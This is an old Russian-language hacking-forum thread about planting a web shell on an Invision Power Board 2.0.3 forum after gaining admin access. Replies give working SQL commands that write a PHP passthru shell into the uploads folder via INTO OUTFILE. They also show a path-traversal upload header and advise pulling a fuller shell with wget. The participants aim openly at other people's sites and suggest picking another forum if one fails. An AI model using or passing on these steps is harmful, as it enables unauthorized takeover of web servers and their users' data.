Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Не получается залить шелл в Ipb |
25.01.2006, 03:10
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810
Репутация:
10
|
|
Не получается залить шелл в Ipb
Форум IPB 2.0.3
Дела такие... в админку залез. Папка emotion доступа на запись не имеет...
Как быть дальше?
Знаю что нужно подделать запрос и залить в папку uploads. Прочитал http://antichat.ru/txt/IPB/index2.php вот это, но не понял, что нужно именно заменять в данном там запросе и как дальше пользоваться программой InetCrack. Если можно где-то посмотреть видео по этому поводу или расскажите пожалуйста.
За ранее благодарен! |
|
|
25.01.2006, 04:23
|
|
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754
Репутация:
97
|
|
попробуй через мускулы залить. если повезет и окажутся привелении писать в файл то будет тебе щастье.заливается так - идешь в sql админимтрирование и даешь команды
UPDATE ibf_members SET name='<? passthru("$cmd"); ?>'WHERE id='0';
SELECT name FROM `ibf_members` WHERE id='0' INTO OUTFILE '/FULL_PATH_TO_FORUM/uploads/shell.php';
UPDATE ibf_members SET name='Guest'WHERE id='0';
путь к форуму смотриш в конфигурации.есть и другуй способ,
юзай поиск по форуму.. эта тема сто раз уже обсуждалась.
|
|
|
|
25.01.2006, 05:01
|
|
Познающий
Регистрация: 10.11.2005
Сообщений: 75
Провел на форуме:
367531
Репутация:
4
|
|
Кста мне вот тоже интерстна тема, по поводу подделки запроса. Там запрос подделывается на это (часть,кусок):
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream
Но где в этом запросе данные о моем ЛОКАЛЬНОМ пути, с которого надо заливать файл сюда: ../../uploads/myFile.php ?
|
|
|
|
25.01.2006, 06:21
|
|
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
Провел на форуме:
560754
Репутация:
97
|
|
<% echo("Hello from injected PHP script") %>
заменяй на <? passthru("$cmd"); ?>
а потмо уж закачаешь wget`ом нормальный шелл .
|
|
|
|
25.01.2006, 16:04
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810
Репутация:
10
|
|
Люди помогите, а если нету прав записи в дерикторию uploads? Че тогда делать, неужели из админки ничего сделать нельзя?  |
|
|
|
25.01.2006, 16:35
|
|
Новичок
Регистрация: 04.01.2006
Сообщений: 13
Провел на форуме:
69682
Репутация:
1
|
|
FoGorm, в uploads хранятся аватары юзеров, получится что на форуме нельзя использовать аватары (может и такое), посмотри.
Последний раз редактировалось ~en$laved~; 25.01.2006 в 16:38..
|
|
|
|
25.01.2006, 17:06
|
|
Познающий
Регистрация: 04.01.2006
Сообщений: 55
Провел на форуме:
106810
Репутация:
10
|
|
Сообщение от ~en$laved~
FoGorm, в uploads хранятся аватары юзеров, получится что на форуме нельзя использовать аватары (может и такое), посмотри.
В том то и дело, незнаю из-за чего админ запретил заливать аватары, возможно ступил что права не дал...
Что можно сделать?
|
|
|
|
25.01.2006, 18:01
|
|
Новичок
Регистрация: 04.01.2006
Сообщений: 13
Провел на форуме:
69682
Репутация:
1
|
|
если действительно везьде -rx- то видимо ничего.
Найди другой форум  |
|
|
|
25.01.2006, 21:39
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Ну не факт что и ступил, на одном из знакомых серверов у админа времени не было разбираться с js в аватарках, вот он и отключил в качестве временной меры закачку аватарок.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
